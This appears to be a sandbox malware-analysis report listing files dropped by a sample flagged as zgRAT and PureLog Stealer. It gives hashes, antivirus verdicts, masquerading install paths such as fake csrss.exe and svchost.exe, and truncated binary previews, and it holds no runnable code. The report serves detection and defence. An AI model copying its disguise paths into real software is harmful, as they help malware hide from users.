                                                                  SSDEEP:98304:HbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6:Hbbi1IXr5nmG9Hb7VmX86
                                                                  MD5:5FE249BBCC644C6F155D86E8B3CC1E12
                                                                  SHA1:F5C550AB2576D2DAEFF9CB72A4D41D1BCFEE0E6D
                                                                  SHA-256:9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
                                                                  SHA-512:B210C6B5D8DB31D8F4EA82A79FE4679CED289636570E3FD72A45C488FD2CD75ED74677D723C1BFA67432E46E71901CB6551595E1053448C2F5E297829A6E1B39
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 92%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.........n.8.. ....8...@.. ....................... 9...........@................................. .8.K.....8.p.....................9...................................................... ............... ..H............text...t.8.. ....8................. ..`.rsrc...p.....8.......8.............@....reloc........9.......8.............@..B................P.8.....H...........L.......n............8......................................0..........(.... ........8........E....N.......)...M...8I...(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............Z.......~.......8....~....:.... ....8........~....([...~....(_... ....<.... ....~....{....:....& ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(S... .... .... ....s....~...
                                                                  Process:C:\Users\user\Desktop\8Ck8T5qRcC.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):6127126
                                                                  Entropy (8bit):7.9895412495725076
                                                                  Encrypted:false
                                                                  SSDEEP:98304:J5+ki65sn6Wfz7pnxCjJaWlpx1dstaNoSwKHf1c3z5MOueAeF0FeLkg4ke4U7Fj6:JUCDOYjJlpZstQoS9Hf12VKX9FeLwkys
                                                                  MD5:838A5BD59DE32F425938CBA6C119CBEE
                                                                  SHA1:3A789DD47202C524F4C10CF37B245174CF02A2F1
                                                                  SHA-256:75AFAAE3D0FBA0ECB6E25BE065B68A7D199186714DC6C615311491E66B781FA9
                                                                  SHA-512:71B38A9C2BD5A62F01B4B78B4CFCE368977E0A0945372BD33779FE5248E44A0FB1EEC015EFEB13FE3A057D80D20435B9AE04FB3D059E0F3BB525E44A19E268B0
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 55%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Xhc.Xhc.Xhc...`._hc...f..hc...g.Rhc...[hc..`.Qhc..g.Ihc..f.phc...b.Shc.Xhb..hc.K.g.Ahc.K.a.Yhc.RichXhc.........PE..d...[..f.........."....(.....l.................@......................................]...`.................................................l...x.......4....`..."...Y].H$......h.......................................@...............P............................text............................... ..`.rdata..B&.......(..................@..@.data....s..........................@....pdata..."...`...$..................@..@.rsrc...4...........................@..@.reloc..h...........................@..B........................................................................................................................................................................................................................................................
                                                                  Process:C:\Users\user\Desktop\8Ck8T5qRcC.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):11662615
                                                                  Entropy (8bit):7.996772653002528
                                                                  Encrypted:true
                                                                  SSDEEP:196608:QCUDfyGowBdnpkYRMZqsrMELkmHe/tQK3j3fxIyAN7z7FUqVYwD7XmL:QDfDoc6Y6/km6GyxgN7zZFVr7X
                                                                  MD5:FC445049713C02F9A9DDAA62E404C9E9
                                                                  SHA1:8BCFA380451D9B71B4933E28C9FFB6710D12323E
                                                                  SHA-256:B39448F8013728D904A44A3FA4C510539D3FDD2AA35A1355D49E0343852A8556
                                                                  SHA-512:14C81AAD762CA16024A35799783F22D244FB88BCC350BEAC27E00CC54B36E822E5FDDDC7CAE414A8A08ED93E2BB93F765C4D2CB3869D552003F9F80B4AD869C4
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.Q...?...?...?.Z.<...?.Z.:...?.Z.;...?......?...:.9.?...;...?...<...?.Z.>...?...>...?.+.;...?.+.=...?.Rich..?.........................PE..d....+.f.........."....%.....p.................@....................................b%....`.....................................................x....`..e.... ..."...........p..X... ..................................@............... ............................text............................... ..`.rdata...-..........................@..@.data...H3..........................@....pdata..."... ...$..................@..@_RDATA..\....P......................@..@.rsrc...e....`......................@..@.reloc..X....p......................@..B................................................................................................................................................................................................
                                                                  Process:C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe
                                                                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):5617152
                                                                  Entropy (8bit):7.71585644239634
                                                                  Encrypted:false
                                                                  SSDEEP:98304:Dei3W2HJn8hqIOLmRLRSo+QqvCRs19A3JIkLJQrAtjRQii7yXdmMpy2N:6Z2i4OcxQECE6ZIkLJIAt8y4
                                                                  MD5:1274CBCD6329098F79A3BE6D76AB8B97
                                                                  SHA1:53C870D62DCD6154052445DC03888CDC6CFFD370
                                                                  SHA-256:BBE5544C408A6EB95DD9980C61A63C4EBC8CCBEECADE4DE4FAE8332361E27278
                                                                  SHA-512:A0FEBBD4915791D3C32531FB3CF177EE288DD80CE1C8A1E71FA9AD59A4EBDDEEF69B6BE7F3D19E687B96DC59C8A8FA80AFFF8378A71431C3133F361B28E0D967
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                  Joe Sandbox View:
                                                                  • Filename: TS-240605-Millenium1.exe, Detection: malicious, Browse
                                                                  • Filename: DevxExecutor.exe, Detection: malicious, Browse
                                                                  • Filename: hacn.exe, Detection: malicious, Browse
                                                                  Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.v....U................@.............................PV.......U...`... ...............................................V......0V.......U..............@V.x.............................U.(.....................V.X............................text....u.......v..................`..`.data...`.U.......U..z..............@....rdata..`.....U......|U.............@..@.pdata........U.......U.............@..@.xdata........U.......U.............@..@.bss.... .....U..........................idata........V.......U.............@....CRT....`.....V.......U.............@....tls......... V.......U.............@....rsrc........0V.......U.............@....reloc..x....@V.......U.............@..B........................................................................................................................................................................
                                                                  Process:C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):4042529
                                                                  Entropy (8bit):7.700603596238004
                                                                  Encrypted:false
                                                                  SSDEEP:98304:yxbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6j:4bbi1IXr5nmG9Hb7VmX86j
                                                                  MD5:45C59202DCE8ED255B4DBD8BA74C630F
                                                                  SHA1:60872781ED51D9BC22A36943DA5F7BE42C304130
                                                                  SHA-256:D07C47F759245D34A5B94786637C3D2424C7E3F3DEA3D738D95BF4721DBF3B16
                                                                  SHA-512:FFF5B16AE38681ED56782C0F0423560DAB45065685D7272424206F43C80486318180AA22D66BD197C8C530E4C24DBAAAA020BEB76B619DC767EE59FAA27E23ED
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\svchost.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\svchost.exe, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 61%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................P............@.........................p...4.......P....@....................... ..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc........@......................@..@.reloc..<#... ...$..................@..B................................................................................................................................................................................................................................................
                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                  File Type:ASCII text, with very long lines (990), with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):990
                                                                  Entropy (8bit):5.907377483651261
                                                                  Encrypted:false
                                                                  SSDEEP:24:sqOazWF0VtppiYQlFmvjPb2svJ3Z2KxNrX:MyjLQlcv3LhXNr
                                                                  MD5:FAEDE394B1FCB286F23D0D4033A06B2A
                                                                  SHA1:FEFD8E6567C3B8ADC53D62058B87F3A9DF381B85
                                                                  SHA-256:607CBCFFE6388D4B3485B8EDD7124F816D281C5EDF41B234436CADE5A23CC738
                                                                  SHA-512:BF0030992D894EBA1D18C1A41CEDEE4AA70AC4095E8251ECEA1CD064C1833D5DB7E5B3F5CC70B32A0C4CF8AF6DFD30AD7B43CC097AC5CFF3E38A06A22C46A2CE
                                                                  Malicious:false
                                                                  Preview:Ks1hn15XtkAM2lpbUCOSORGG6MaJcBxrOCPY1m5uQzrRprDKf5OWYbu2mulaav4rwT70VQkrGeCZkybPJQnhwaTxRWwGBeTe49eVuMyPUhP3ZVSxTWRKIX4WAKi9eeqlLhfkTFe6bYMPLZX6E9wpNIWgFIVkozu01ns10sdN1UstLpLkwm4frAYCL8fLu4SmnVYhrfFVfjx2amVa7uxB4PJ0Ppq1NRd6CGGzQn3Qgj9HMfmjnEOAHQrXMhRBzNING10TgfJT0geVQBntDHOIDczvYsmsV2bSavBVpSDH54JkvVHL4h7s99JnCE4x3a78FM5e9SEvDHMJTO9Ckbyx4tTamYTkXPNf6KfjanLldLo1wATxE2NclJDW2e2l9dYy4rMJtam7PNUtEcnlEfgfCv3wGJr6vjm9wz7FxKEoPQMYzURa0Qhd73wIxaCjspMpkV6Peiy3a2Pwjf7v1RGeCIB3DyRXIf5kEgxdYC5RboDFoAjScQrbjrncTCLpQbu56osCseXzWyDXF6PCP941xeBW3VJV0PBA3HJ9Sgj831EvoPWXxJaRg2IbnVJWUB9GxCe8xPusZ585ZPsn9whrztdA9sV7XMo1288lvYkhYr1k4MBYmfXhdSRDid9E4xVNRGDbRH2kMASH23Gwq7V1yGXjq4DRYfnlVnSxJjGemxVdAJKpWMY7bdYLtdvWEkMqXqwOkTmH10PBu4jguY4LHpK2PHEqytaBlpGUX5EDkQGlOWby3OmqpAjrg39dP5SHZNaExPJzT1l0jin2qPwkHuWkGZyd5lyo88LB6WBoFwWyYsH7QHw9JsAp1z8Ybp3rD62lXm6TOHfUXhMXS0NyyyfQ7fKGXmNZ3pvb0fknKdvBMqSTnlGkbE3Obmn1cz6l3FasvuhwQjnVDdDRN0cvgn7ywhAO1sLUgJHGPjh3EUU2ahL8iWnmXKFQIm6OtT4hYTy3V6BoSjrMTFYOVBpfFj7WE18nnS
                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):3720704
                                                                  Entropy (8bit):7.733352681119499
                                                                  Encrypted:false
                                                                  SSDEEP:98304:HbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6:Hbbi1IXr5nmG9Hb7VmX86
                                                                  MD5:5FE249BBCC644C6F155D86E8B3CC1E12
                                                                  SHA1:F5C550AB2576D2DAEFF9CB72A4D41D1BCFEE0E6D
                                                                  SHA-256:9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
                                                                  SHA-512:B210C6B5D8DB31D8F4EA82A79FE4679CED289636570E3FD72A45C488FD2CD75ED74677D723C1BFA67432E46E71901CB6551595E1053448C2F5E297829A6E1B39
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\HpQPPZazcv.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\HpQPPZazcv.exe, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 92%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.........n.8.. ....8...@.. ....................... 9...........@................................. .8.K.....8.p.....................9...................................................... ............... ..H............text...t.8.. ....8................. ..`.rsrc...p.....8.......8.............@....reloc........9.......8.............@..B................P.8.....H...........L.......n............8......................................0..........(.... ........8........E....N.......)...M...8I...(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............Z.......~.......8....~....:.... ....8........~....([...~....(_... ....<.... ....~....{....:....& ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(S... .... .... ....s....~...
                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):131
                                                                  Entropy (8bit):5.481214414030158
                                                                  Encrypted:false
                                                                  SSDEEP:3:ELLuGiacldEWw6xEl7O8o0PgVQhbIm3n:EncjEWw6068tPgAv3
                                                                  MD5:CF97347593F55820BE9C2381B2EA0852
                                                                  SHA1:3F79A59D03C7DE056D89C5A00DBD0F0A0FE9D923
                                                                  SHA-256:3BE9909C7AB94E81DB59BF6A7CB53E9B0C3E46501C4095BE8AA4E2958E7E3436
                                                                  SHA-512:211C9D758C81AFDDA79BBBCF91C047ADFEA4F23558A7F0345A627CA2A45F0ED22F48E1CAB78A04A2E0676F1AA8830BE733A202A01985D1CC4D2B2EF734376428
                                                                  Malicious:false
                                                                  Preview:sSmlV9Txc37DOr3snZczVcye8XA9Z6wglQfDZEJGPJ3L35Z5ZbHAUowQdIn78TXgGab7MzTjPVjLjnkD8Fk8ywM6ePjQbMH5wWFddbtjIiu8Fkr0ij83tZsUOed7QCICNnZ
                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):3720704
                                                                  Entropy (8bit):7.733352681119499
                                                                  Encrypted:false
                                                                  SSDEEP:98304:HbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6:Hbbi1IXr5nmG9Hb7VmX86
                                                                  MD5:5FE249BBCC644C6F155D86E8B3CC1E12
                                                                  SHA1:F5C550AB2576D2DAEFF9CB72A4D41D1BCFEE0E6D
                                                                  SHA-256:9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
                                                                  SHA-512:B210C6B5D8DB31D8F4EA82A79FE4679CED289636570E3FD72A45C488FD2CD75ED74677D723C1BFA67432E46E71901CB6551595E1053448C2F5E297829A6E1B39
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\powershell.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\powershell.exe, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 92%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.........n.8.. ....8...@.. ....................... 9...........@................................. .8.K.....8.p.....................9...................................................... ............... ..H............text...t.8.. ....8................. ..`.rsrc...p.....8.......8.............@....reloc........9.......8.............@..B................P.8.....H...........L.......n............8......................................0..........(.... ........8........E....N.......)...M...8I...(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............Z.......~.......8....~....:.... ....8........~....([...~....(_... ....<.... ....~....{....:....& ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(S... .... .... ....s....~...
                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1915
                                                                  Entropy (8bit):5.363869398054153
                                                                  Encrypted:false
                                                                  SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4vHNpv:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4vb
                                                                  MD5:0C47412B6C6EF6C70D4B96E4717A5D3B
                                                                  SHA1:666FCC7898B52264D8A144600D7A3B0B59E39D66
                                                                  SHA-256:0B3F6655476FA555F55859443DE496AF7279529D291EF9745C22C5C283B648F9
                                                                  SHA-512:4E51FCBCA176BF9C5175478C23AE01445F13D9AC93771C7F73782AF9D98E8544A82BBFB5D3AA6E2F3ECF1EFB59A8466EB763A30BD795EFE78EE46429B2BEAC6C
                                                                  Malicious:false
                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f
                                                                  Process:C:\Recovery\HpQPPZazcv.exe
                                                                  File Type:CSV text
                                                                  Category:dropped
                                                                  Size (bytes):847
                                                                  Entropy (8bit):5.354334472896228
                                                                  Encrypted:false
                                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                  MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                  SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                  SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                  SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                  Malicious:false
                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):64
                                                                  Entropy (8bit):0.34726597513537405
                                                                  Encrypted:false
                                                                  SSDEEP:3:Nlll:Nll
                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                  Malicious:false
                                                                  Preview:@...e...........................................................
                                                                  Process:C:\Recovery\HpQPPZazcv.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                  Category:dropped
                                                                  Size (bytes):40960
                                                                  Entropy (8bit):0.8553638852307782
                                                                  Encrypted:false
                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Recovery\HpQPPZazcv.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                  Category:dropped
                                                                  Size (bytes):28672
                                                                  Entropy (8bit):2.5793180405395284
                                                                  Encrypted:false
                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Recovery\HpQPPZazcv.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                  Category:dropped
                                                                  Size (bytes):40960
                                                                  Entropy (8bit):0.8553638852307782
                                                                  Encrypted:false
                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):709410
                                                                  Entropy (8bit):7.928995703191502
                                                                  Encrypted:false
                                                                  SSDEEP:12288:9CJt7G19YHjWTnRyMqTVGInIQghHKD9vUOUKkmSFX/IGC0XdEcvaPm:9C49RTnMlR/IQqu9vNAyGCsFkm
                                                                  MD5:5D6FA362A54889B068DF9721F0A3C8F3
                                                                  SHA1:16BF6EE0E61E7A0087AB9CA190CECB33E37A3704
                                                                  SHA-256:DE2F3A39123B615C69F09E0A67DD1BB269F29E26FA391AAC1004BC3428C35314
                                                                  SHA-512:E7AE358F4367A33097DDB3FE2055AADD208B1B2B2FC850C1BBBB1612DF30590FB0FBBFE2BFB97079AE96EA61842C155D1C7862A2CC588C7E2E3A90DCAD505FBE
                                                                  Malicious:false
                                                                  Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...^.v..{NW...)..3.].=..9m.v.m.EH..lc...x7.}........`..$.b....-..I...........R.89.w"./..|.......Z.7BoY..M.s3c+......m..?2...0....9.s....~....#}..x_.d$....5@....v...}.z......v.k..T..)...'..N..X..}'.e-....mA..C.~....WP?vI..^S;fqG..=t.G-...&.#_..}?[8...rO..........aS.....?~1...A....%}?.q}........{......g.D...%.......<.....<U..>......7...|........x_.....-...O.W.H..T..... 6.O&......P?.....~C......T....A.yK}..v.Ca....c.?2....N.}....}..(.L..'..G}..C.....q\?..c\k..|.~.c...../.J.k...<..o.yUl.......{.{.....}1.......)6n....}b..1..{...y..v_..17.v........-.4....{^..s..v,..G;....zo.c.....6;.6...G.C...>7..#.[...8...D}.{.....{.}c....=..-....=...%...$.v.;.w...1..#^+....Lycw....[.n..%.......?..].I....9.c.s.......v....|D....H..pg....lB..w'.<b}..}...O.3.mwG..!.o.X}......c....>h/...>........x.v1o..C..x..'.<A.y`n...3.1.O......m)....).\].k1..i..q,..kN.
                                                                  Process:C:\Recovery\HpQPPZazcv.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                  Category:dropped
                                                                  Size (bytes):126976
                                                                  Entropy (8bit):0.47147045728725767
                                                                  Encrypted:false
                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Recovery\HpQPPZazcv.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                  Category:dropped
                                                                  Size (bytes):20480
                                                                  Entropy (8bit):0.5707520969659783
                                                                  Encrypted:false
                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
